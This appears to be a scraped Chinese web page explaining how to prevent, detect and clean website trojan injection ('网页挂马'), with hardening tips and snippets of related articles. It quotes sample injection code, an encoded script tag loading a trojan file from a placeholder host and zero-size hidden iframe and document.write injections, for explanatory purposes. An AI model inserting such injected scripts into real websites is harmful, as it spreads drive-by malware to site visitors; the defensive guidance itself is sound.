如何预防和检测网页挂马?

在网站优化设计当中,检测网页木马也是很重要的一项工作,目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。本文主要介绍网页挂马的种类、如何检测网页是否被挂马、如何清除网页木马。如何防止网页被挂马


1:网页挂马的种类.

目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的。更详细的资料,请点击查看挂马代码大全。
比尔云以前做过的‘极品源码下载站’就遇到过JS挂马
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
&lsquo;比尔云论坛&rsquo;就遇到用户提权,利用动网程序漏洞(上传附件漏洞)拥有网站管理员权限。删了论坛几千条数据,一千多位会员的ID

2:如何检测网页是否被挂马。

(1):专业检测工具,六款免费网页安全检测工具横向测评

(2):google检测,或者可以利用Google搜索你的网站、博客进行检测。如果有网站有木马则google会在搜索列表的下方提示该网站有不安全因素。

(3):杀毒软件检测,常用的杀毒软件也可以检测出来。

(4):人工检测,打开你的网站、博客,点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。

(5):使用360网站安全监测。例:检测比尔云是否安全可点此查看。

3:如何清除网页木马。

一旦中了网页木马,就看那些文件是最近修改过的,主要查看这些新文件,(从FTP中可以查看文件最近修改时间。)然后进入源文件把相关的网页挂马种类的可疑代码删除。
如果你对你所使用的网站、博客程序不熟悉,建议删除所有文件(数据库、图片、文档、程序模板主题等文件夹可以保留)

4:如何防止网页被挂马。如果你的网站还没有被挂马,请从预防开始吧。

(1):对网友开放上传附件功能的网站一定要进行身份认证,并只允许信任的人使用上传程序。

(2):保证你所使用的程序及时的更新。

(3):不要在前台网页上加注后台管理程序登陆页面的链接。

(4):要时常备份数据库等重要文件,但不要把备份数据库放在程序默认的备份目录下。

(5):管理员的用户名和密码要有一定复杂性,不能过于简单。

(6):IIS中禁止写入和目录禁止执行的功能,二项功能组合,可以有效的防止ASP木马。

(7):可以在服务器、虚拟主机控制面板,设置执行权限选项中,直接将有上传权限的目录,取消ASP的运行权限。

(8):创建一个robots.txt上传到网站根目录。Robots能够有效的防范利用搜索引擎窃取信息的骇客。

时间: 2024-09-30 03:40:09

如何预防和检测网页挂马?的相关文章

预防网页挂马的方法总结_javascript技巧

预防网页挂马的方法总结: 在网站优化设计当中,检测网页木马也是很重要的一项工作,目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的.本文主要介绍网页挂马的工作原理及种类.常见方式.执行方式.如何检测网页是否被挂马.如何清除网页木马.如何防止网页被挂马. 1:网页挂马工作原理的种类.  (1)工作原理: 作为网页挂马的散布者,其目的是将木马下载到用户本地,并进一步执行,当木马获得执行之后,就意味着会有更多的木马被下载,进一步被执行,进入一个恶性的循环,从而使用户的电脑

安全技术:网页挂马工作原理完全分析

通常,微软IE工作过程描述如下:   作为网页挂马的散布者,其目的是将木马下载到用户本地,并进一步执行,当木马获得执行之后,就意味着会有更多的木马被下载,进一步被执行,进入一个恶性的循环,从而使用户的电脑遭到攻击和控制.为达到目的首先要将木马下载到本地.根据上图的流程,常见的方式有以下几种: 1.将木马伪装为页面元素.木马则会被浏览器自动下载到本地. 2.利用脚本运行的漏洞下载木马 3.利用脚本运行的漏洞释放隐含在网页脚本中的木马 4.将木马伪装为缺失的组件,或和缺失的组件捆绑在一起(例如:fl

浅析网页挂马原理及实现方式

一.网页挂马介绍 (1).挂马与网马 1.挂马 Ø从"挂马"这个词中就知道,它和"木马"脱离不了关系,的确,挂马的目的就是将木马传播出去 Ø黑客入侵了一些网站之后,将自己编定的网页木马嵌入到其网站的页面(能常是在网站主页)中,利用该网站的流量将自己的网页木马传播出去从页达到自己的目的 2.网马 Ø网马,即"网页木马",就是将木马和网页结合在一起,当打开网页的时候就会自动下载并运行其木马程序 (2).网页木马运行原理 Ø最初的网页木马就是利用了IE

超过四成“网页挂马”利用工具软件漏洞传播

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 日前,国内计算机反病毒软件厂商江民科技公布了互联网恶意网页监测结果.据江民恶意网页监测系统统计的数据显示,仅5月上半月,恶意网页挂马者使用的漏洞中,微软漏洞占57%,其他工具软件漏洞占43%,而病毒应用最广泛的工具软件漏洞集中在影音.视频.聊天.网络游戏平台等最热门的工具软件中. 江民反病毒专家认为,这表明微软操作系统漏洞已经不是病毒木马传播

网页挂马也是黑帽SEO手法之一?

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 在此之前先引入一下网站被挂马的概念吧,什么是网页挂马?挂马指的是黑客入侵了一些网站后,将自己编写的网页木马(其实是一段网页代码,主要以ASP和PHP代码为主)嵌入被黑网站的主页中,再上传到空间里面,当浏览者打开网页的同时这段代码被执行也会运行木马.网站被挂马可能很多人都遇到过,我就遇到过好几次了.我以前接手的一个企业网站,程序很简单,是我用a

域名整顿有利于遏制网页挂马

中介交易 SEO诊断 淘宝客 云主机 技术大厅 商报讯(记者 毛涛涛)中国互联网络信息中心(CNNIC)日前发布公告,停止个人申请".cn"域名,所有申请".cn"的人必须具有法人资格并提交书面申请资料.在业界看来,域名整顿除了可以打击黄色网站,或将有效遏制网页挂马的日益泛滥. 调查显示,国内被挂马的网页最终指向的病毒源头,90%以上都是使用".cn"域名的个人网站.究其原因,一是".cn"申请没有任何门槛,无任何身份认证,而

网页挂马方式整理及详细介绍_javascript技巧

网页挂马方式 一:框架挂马 <iframe src=地址 width=0 height=0></iframe>  二:js文件挂马 首先将以下代码 document.write("<iframe width='0' height='0' src='地址'></iframe>"); 保存为xxx.js, 则JS挂马代码为 <script language=javascript src=xxx.js></script>

仅5月份 就有近437万人次网民遭到网页挂马攻击

高考生填报志愿时期 高考已结束,但在考生和家长忙于上网搜索填报志愿.选择专业时,黑客的魔爪也伸向了教育类网站,随时准备伺机而动,盗取用户隐私信息.骗取钱财.与此同时,手机垃圾短信数量迅猛增加,会电脑和手机用户不胜其烦. 据瑞星"云安全"系统统计,仅5月份,就有近437万人次网民遭到网页挂马攻击,在瑞星截获的615494个挂马网址中,教育类的网站高达30%以上,诸如山东交通学院.中南大学商学院.华中农业大学普通本科招生网等网站都频繁遭遇挂马袭击,影响正常的展示和工作.同样,近日网秦&qu

挂马代码 网页挂马分析_漏洞研究

如今网民上网可算是提心吊胆,面对病毒,也许杀毒软件还能防止一二,但如果遇到网页中挂马行为,甚至直接将用户当前机所安装的杀毒软件直接强行关闭,那么其后果是不言而喻的.如今的网页有马行为也不像以前那么单一,甚至不出现下载提示,直接从后台开始下载运行其马,然后秘密的收集用户信息并返溃到恶意者手中.     网马危害     如果一台正常的网络服务器被恶意用户入侵,其网页被挂马,在一定程度上可以说是网页被篡改,其危害是巨大的,随着用户访问流量的增多,会造成此马的传播性越发增大,由于其隐蔽性比较强,导至很